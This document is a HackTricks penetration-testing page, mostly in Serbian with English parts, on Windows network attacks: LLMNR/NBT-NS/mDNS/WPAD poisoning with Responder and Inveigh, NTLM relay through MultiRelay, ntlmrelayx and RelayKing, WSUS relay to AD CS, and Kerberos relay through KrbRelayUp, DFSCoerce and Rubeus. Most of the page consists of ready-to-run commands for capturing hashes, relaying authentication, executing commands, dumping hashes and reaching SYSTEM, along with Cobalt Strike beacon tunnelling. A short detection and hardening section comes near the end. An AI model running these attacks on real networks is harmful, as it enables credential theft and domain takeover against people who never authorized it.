Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

• Proverite planove pretplate!
• Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
• Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

Mrežni protokoli

Protokoli za lokalno rešavanje imena

• LLMNR, NBT-NS, and mDNS:
• Microsoft i drugi operativni sistemi koriste LLMNR i NBT-NS za lokalno rešavanje imena kada DNS zakaže. Slično tome, Apple i Linux sistemi koriste mDNS.
• Ovi protokoli su podložni presretanju i spoofingu zbog njihove neautentifikovane, broadcast prirode preko UDP-a.
• Responder and Dementor se mogu koristiti za lažno predstavljanje servisa slanjem falsifikovanih odgovora hostovima koji vrše upite preko ovih protokola.
• Dalje informacije o lažnom predstavljanju servisa koristeći Responder mogu se naći here.

Protokol za automatsko otkrivanje web proxy-ja (WPAD)

• WPAD omogućava browserima da automatski otkriju podešavanja proxy-ja.
• Otkrivanje se obavlja preko DHCP-a, DNS-a, ili fallback-a na LLMNR i NBT-NS ako DNS zakaže.
• Responder može automatizovati WPAD napade, usmeravajući klijente ka malicioznim WPAD serverima.

Responder/Dementor za poisoning protokola

• Responder je alat koji se koristi za poisoning LLMNR, NBT-NS i mDNS upita, selektivno odgovarajući bazirano na tipu upita, prvenstveno ciljajući SMB servise.

• Dolazi preinstaliran u Kali Linuxu, konfiguriše se u /etc/responder/Responder.conf.

• Responder prikazuje captur-ovane hasheve na ekranu i čuva ih u direktorijumu /usr/share/responder/logs.

• Podržava i IPv4 i IPv6.

• Windows verzija Responder-a je dostupna here.

• Dementor proširuje teme multicast poisoning-a i dodatno funkcioniše kao rogue service provider (uključujući CUPS RCE podršku)

• Ukupna struktura je slična Responder-u sa finijom konfiguracijom. (default je ovde: Dementor.toml)

• Kompatibilnost između Dementor-a i Responder-a data je ovde: Compatibility Matrix

• Intro i dokumentacija ovde: Dementor - Docs

• Ispravlja probleme sa capture-om koje je Responder uveo na određenim protokolima

Pokretanje Responder-a

• Za pokretanje Responder-a sa podrazumevanim podešavanjima: responder -I <Interface>
• Za agresivnije sondiranje (sa potencijalnim nuspojavama): responder -I <Interface> -P -r -v
• Tehnike za capture NTLMv1 challenge/response radi lakšeg cracking-a: responder -I <Interface> --lm --disable-ess
• WPAD impersonation se može aktivirati sa: responder -I <Interface> --wpad
• NetBIOS zahtevi se mogu resolve-ovati na IP napadača, i može se postaviti authentication proxy: responder.py -I <interface> -Pv

Pokretanje Dementor-a

• Sa podrazumevanim podešavanjima: Dementor -I <interface>
• Sa podrazumevanim podešavanjima u analysis modu: Dementor -I <interface> -A
• Automatsko NTLM session downgrade (ESS): Dementor -I <interface> -O NTLM.ExtendedSessionSecurity=Off
• Pokreni trenutnu sesiju sa custom configom: Dementor -I <interface> --config <file.toml>

DHCP Poisoning sa Responder-om

• Spoofing DHCP odgovora može trajno poison-ovati ruting informacije žrtve, nudeći prikriveniju alternativu ARP poisoning-u.
• Zahteva precizno znanje o konfiguraciji ciljne mreže.
• Pokretanje napada: ./Responder.py -I eth0 -Pdv
• Ova metoda može efikasno capture-ovati NTLMv1/2 hasheve, ali zahteva pažljivo postupanje da bi se izbegao prekid mreže.

Hvatanje kredencijala sa Responder/Dementor

• Responder/Dementor će lažno predstavljati servise koristeći gore pomenute protokole, hvatajući kredencijale (obično NTLMv2 Challenge/Response) kada korisnik pokuša da se autentifikuje prema spoofed servisima.
• Mogu se pokušati downgrade-ovati na NetNTLMv1 ili onemogućiti ESS radi lakšeg cracking-a kredencijala.

If you already have a writable SMB share that victims browse, you can coerce outbound SMB without spoofing by planting UNC-based lure files (SCF/LNK/library-ms/desktop.ini/Office) generated with ntlm_theft, then catching the authentication with Responder. See the Explorer-triggered UNC lure workflow.

Važno je napomenuti da primena ovih tehnika treba da bude zakonita i etička, uz odgovarajuću autorizaciju i izbegavanje ometanja ili neovlašćenog pristupa.

Inveigh

Inveigh je alat za penetration testers i red teamere, dizajniran za Windows sisteme. Nudi funkcionalnosti slične Responder-u, izvodeći spoofing i man-in-the-middle napade. Alat je evoluirao iz PowerShell skripte u C# binarni fajl, sa Inveigh i InveighZero kao glavnim verzijama. Detaljni parametri i uputstva mogu se naći u wiki.

Inveigh se može koristiti preko PowerShell-a:

Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y

Ili izvršeno kao C# binarni fajl:

Inveigh.exe

NTLM Relay Attack

Ovaj napad koristi SMB autentifikacione sesije za pristup ciljnom računaru i, ako uspe, omogućava sistemski shell. Ključni preduslovi uključuju:

• Autentifikovani korisnik mora imati Local Admin pristup na relayed host-u.
• SMB signing treba biti onemogućen.

445 prosleđivanje porta i tunelovanje

U scenarijima gde direktno uvođenje na mrežu nije izvodljivo, saobraćaj na portu 445 mora biti prosleđen i tunelovan. Alati poput PortBender pomažu u preusmeravanju saobraćaja sa porta 445 na drugi port, što je od suštinske važnosti kada je dostupan Local Admin pristup za učitavanje drajvera.

Podešavanje i korišćenje PortBender-a u Cobalt Strike:

Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)

beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080

# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop

Other Tools for NTLM Relay Attack

• Metasploit: Konfiguriše se sa proxies, detaljima lokalnog i udaljenog hosta.
• smbrelayx: Python skripta za relaying SMB sessions i izvršavanje komandi ili postavljanje backdoors.
• MultiRelay: Alat iz Responder suite za relay određenih korisnika ili svih korisnika, izvršavanje komandi ili dump hashes.

Svaki alat se može konfigurisati da radi kroz SOCKS proxy ako je potrebno, što omogućava napade čak i pri indirektnom pristupu mreži.

MultiRelay Operation

MultiRelay se izvršava iz /usr/share/responder/tools direktorijuma, ciljajući određene IP adrese ili korisnike.

python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes

# Proxychains for routing traffic

RelayKing – otkrivanje ciljeva pogodnih za relay i kurirane liste za relay

RelayKing je NTLM relay alat za proveru izloženosti koji mapira gde su relay-i izvodljivi i proizvodi liste ciljeva spremne za upotrebu sa ntlmrelayx.py -tf. Proverava hardening protokola (SMB signing/channel binding; HTTP/HTTPS/MSSQL/LDAP/LDAPS EPA/CBT; RPC auth) i označava coercion/reflection helpers (PetitPotam/PrinterBug/DFSCoerce, WebClient/WebDAV, NTLMv1, CVE-2025-33073 reflection).

• Autentifikacija poboljšava pouzdanost provera HTTPS/LDAPS CBT i MSSQL EPA; nivo SMB signing/signature se ispituje bez autentifikacije.
• Cross-protocol relay pathing koristi potvrđene Net-NTLMv1 (--ntlmv1/--ntlmv1-all) nalaze; za svaku putanju se daje rangiranje ozbiljnosti.
• --gen-relay-list <file> upisuje grep-prijateljsku listu ciljeva za ntlmrelayx.py -tf <file> kako bi se izbeglo pokušavanje i greške.
• --coerce-all masovno pokreće PetitPotam/DFSCoerce/PrinterBug protiv svih ciljeva; --ntlmv1-all (RemoteRegistry) i --audit (prikupljanje LDAP hostova u celoj domeni) su bučni i generišu mnogo prijavljivanja/udaljenih pristupa.
• --proto-portscan ubrzava skeniranje preskakanjem zatvorenih portova; --krb-dc-only pomaže kada DC-ovi blokiraju NTLM ali drugi servisi ga i dalje prihvataju.

Example sweeps:

# Authenticated audit across multiple protocols + generate relay list for ntlmrelayx
python3 relayking.py -u lowpriv -p 'P@ssw0rd!' -d lab.local --dc-ip 10.0.0.10 \
--audit --protocols smb,ldap,ldaps,mssql,http,https --proto-portscan --ntlmv1 \
--threads 10 -vv -o plaintext,json --output-file relayking-scan --gen-relay-list relaytargets.txt

# Unauthenticated CIDR sweep for SMB/LDAP/HTTP relayability
python3 relayking.py --null-auth --protocols smb,ldap,http --proto-portscan -o plaintext 10.10.0.0/24

Ovi alati i tehnike čine sveobuhvatan skup za izvođenje NTLM Relay napada u različitim mrežnim okruženjima.

Abusing WSUS HTTP (8530) for NTLM Relay to LDAP/SMB/AD CS (ESC8)

WSUS klijenti se autentifikuju na svoj update server koristeći NTLM preko HTTP-a (8530) ili HTTPS-a (8531). Kada je HTTP omogućen, periodični check-in-ovi klijenata mogu se prisiliti ili presresti na lokalnom segmentu i proslijediti sa ntlmrelayx na LDAP/LDAPS/SMB ili AD CS HTTP endpoint-e (ESC8) bez lomljenja hash-eva. Ovo se uklapa u normalni update saobraćaj i često dovodi do autentifikacija naloga mašina (HOST$).

What to look for

• GPO/registry konfiguracija pod HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate i …\WindowsUpdate\AU:
• WUServer (npr. http://wsus.domain.local:8530)
• WUStatusServer (reporting URL)
• UseWUServer (1 = WSUS; 0 = Microsoft Update)
• DetectionFrequencyEnabled i DetectionFrequency (sati)
• WSUS SOAP endpoint-i koje klijenti koriste preko HTTP-a:
• /ClientWebService/client.asmx (approvals)
• /ReportingWebService/reportingwebservice.asmx (status)
• Podrazumevani portovi: 8530/tcp HTTP, 8531/tcp HTTPS

Reconnaissance

• Unauthenticated
• Scan for listeners: nmap -sSVC -Pn –open -p 8530,8531 -iL
• Presreći WSUS HTTP saobraćaj putem L2 MITM i zabeleži aktivne klijente/endpoint-e sa wsusniff.py (HTTP only unless you can make clients trust your TLS cert).
• Authenticated
• Parse SYSVOL GPOs for WSUS keys with MANSPIDER + regpol (wsuspider.sh wrapper summarises WUServer/WUStatusServer/UseWUServer).
• Query endpoints at scale from hosts (NetExec) or locally: nxc smb -u -p -M reg-query -o PATH=“HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate” KEY=“WUServer” reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate

End-to-end HTTP relay steps

1. Position for MITM (same L2) so a client resolves the WSUS server to you (ARP/DNS poisoning, Bettercap, mitm6, etc.). Example with arpspoof: arpspoof -i -t <wsus_client_ip> <wsus_server_ip>

2. Redirect port 8530 to your relay listener (optional, convenient): iptables -t nat -A PREROUTING -p tcp –dport 8530 -j REDIRECT –to-ports 8530 iptables -t nat -L PREROUTING –line-numbers

3. Start ntlmrelayx with the HTTP listener (requires Impacket support for HTTP listener; see PRs below): ntlmrelayx.py -t ldap:// -smb2support -socks –keep-relaying –http-port 8530

Other common targets:

• Relay to SMB (if signing off) for exec/dump: -t smb://
• Relay to LDAPS for directory changes (e.g., RBCD): -t ldaps://
• Relay to AD CS web enrollment (ESC8) to mint a cert and then authenticate via Schannel/PKINIT: ntlmrelayx.py –http-port 8530 -t http:///certsrv/certfnsh.asp –adcs –no-http-server For deeper AD CS abuse paths and tooling, see the AD CS page:

AD CS Domain Escalation

4. Trigger a client check-in or wait for schedule. From a client: wuauclt.exe /detectnow or use the Windows Update UI (Check for updates).

5. Use the authenticated SOCKS sessions (if -socks) or direct relay results for post-exploitation (LDAP changes, SMB ops, or AD CS certificate issuance for later authentication).

HTTPS constraint (8531)

• Passive interception of WSUS over HTTPS is ineffective unless clients trust your certificate. Without a trusted cert or other TLS break, the NTLM handshake can’t be harvested/relayed from WSUS HTTPS traffic.

Notes

• WSUS was announced deprecated but remains widely deployed; HTTP (8530) is still common in many environments.
• Useful helpers: wsusniff.py (observe HTTP WSUS check-ins), wsuspider.sh (enumerate WUServer/WUStatusServer from GPOs), NetExec reg-query at scale.
• Impacket restored HTTP listener support for ntlmrelayx in PR #2034 (originally added in PR #913).

Force NTLM Logins

U Windowsu možda ćete moći da primorate neke privilegovane naloge da se autentifikuju prema proizvoljnim mašinama. Pročitajte sledeću stranicu da biste naučili kako:

Force NTLM Privileged Authentication

Kerberos Relay attack

A Kerberos relay attack steals an AP-REQ ticket from one service and re-uses it against a second service that shares the same computer-account key (because both SPNs sit on the same $ machine account). This works even though the SPNs’ service classes differ (e.g. CIFS/ → LDAP/) because the key that decrypts the ticket is the machine’s NT hash, not the SPN string itself and the SPN string is not part of the signature.

Unlike NTLM relay, the hop is limited to the same host but, if you target a protocol that lets you write to LDAP, you can chain into Resource-Based Constrained Delegation (RBCD) or AD CS enrollment and pop NT AUTHORITY\SYSTEM in a single shot.

For detailed info about this attack check:

• https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html

• https://decoder.cloud/2025/04/24/from-ntlm-relay-to-kerberos-relay-everything-you-need-to-know/

• 1. Kerberos basics

• Tickets su enkriptovani ključem izvedenim iz lozinke naloga koji poseduje SPN.
• The Authenticator inside the AP-REQ has a 5-minute timestamp; replay inside that window is valid until the service cache sees a duplicate.
• Windows retko proverava da li se SPN string u ticket-u poklapa sa servisom koji napadate, tako da ticket za CIFS/HOST obično dekodira ispravno na LDAP/HOST.

• 2. What must be true to relay Kerberos

1. Shared key: source and target SPNs belong to the same computer account (default on Windows servers).
2. No channel protection: SMB/LDAP signing off and EPA off for HTTP/LDAPS.
3. You can intercept or coerce authentication: LLMNR/NBNS poison, DNS spoof, PetitPotam / DFSCoerce RPC, fake AuthIP, rogue DCOM, etc..
4. Ticket source not already used: you win the race before the real packet hits or block it entirely; otherwise the server’s replay cache fires Event 4649.
5. You need to somehow be able to perform a MitM in the communication maybe being part of the DNSAmins group to modify the DNS of the domain or being able to change the HOST file of the victim.

Kerberos Relay Steps

• 3.1 Recon the host

# find servers where HTTP, LDAP or CIFS share the same machine account
Get-ADComputer -Filter * -Properties servicePrincipalName |
Where-Object {$_.servicePrincipalName -match '(HTTP|LDAP|CIFS)'} |
Select Name,servicePrincipalName

• 3.2 Pokreni relay listener

KrbRelayUp

# one-click local SYSTEM via RBCD
.\KrbRelayUp.exe relay --spn "ldap/DC01.lab.local" --method rbcd --clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8

KrbRelayUp kombinuje KrbRelay → LDAP → RBCD → Rubeus → SCM bypass u jedan binarni fajl.

• 3.3 Coerce Kerberos auth

# coerce DC to auth over SMB with DFSCoerce
.\dfscoerce.exe --target \\DC01.lab.local --listener 10.0.0.50

DFSCoerce natera DC da nam pošalje Kerberos CIFS/DC01 ticket.

• 3.4 Relay the AP-REQ

KrbRelay izvlači GSS blob iz SMB, prepakovava ga u LDAP bind i prosleđuje ga na ldap://DC01—autentifikacija uspeva zato što ga dekriptuje isti ključ.

• 3.5 Abuse LDAP ➜ RBCD ➜ SYSTEM

# (auto inside KrbRelayUp) manual for clarity
New-MachineAccount -Name "FAKE01" -Password "P@ss123"
KrbRelay.exe -spn ldap/DC01 -rbcd FAKE01_SID
Rubeus s4u /user:FAKE01$ /rc4:<hash> /impersonateuser:administrator /msdsspn:HOST/DC01 /ptt
SCMUACBypass.exe

Sada imate NT AUTHORITY\SYSTEM.

Još puteva koje vredi znati

Otklanjanje problema

Detekcija

• Naglo povećanje Event 4769 za CIFS/, HTTP/, LDAP/ iz istog izvora u roku od nekoliko sekundi.
• Event 4649 na servisu označava detektovan replay.
• Kerberos prijava sa 127.0.0.1 (relay na lokalni SCM) je veoma sumnjiva — mapirajte pomoću Sigma pravila u KrbRelayUp docs.
• Pratite izmene atributa msDS-AllowedToActOnBehalfOfOtherIdentity ili msDS-KeyCredentialLink.

Ojačavanje

1. Obavezno omogućite LDAP & SMB signing + EPA na svakom serveru.
2. Razdvojte SPN-ove tako da HTTP nije na istom nalogu kao CIFS/LDAP.
3. Zakrpajte coercion vektore (PetitPotam KB5005413, DFS, AuthIP).
4. Podesite ms-DS-MachineAccountQuota = 0 da zaustavite neovlašćena pridruživanja računara.
5. Upozoravajte na Event 4649 i neočekivane loopback Kerberos prijave.

References

• HTB: Breach – Writable SMB share lures + Responder capture → NetNTLMv2 crack
• https://intrinium.com/smb-relay-attack-tutorial/
• https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/
• https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
• https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
• WSUS Is SUS: NTLM Relay Attacks in Plain Sight (TrustedSec)
• GoSecure – Abusing WSUS to enable NTLM relaying attacks
• Impacket PR #2034 – Restore HTTP server in ntlmrelayx
• Impacket PR #913 – HTTP relay support
• WSUScripts – wsusniff.py
• WSUScripts – wsuspider.sh
• MS-WSUSOD – Windows Server Update Services: Server-to-Client Protocol
• Microsoft – WSUS deprecation announcement
• RelayKing v1.0
• Depth Security – Introducing RelayKing: Relay to Royalty

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

• Proverite planove pretplate!
• Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
• Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.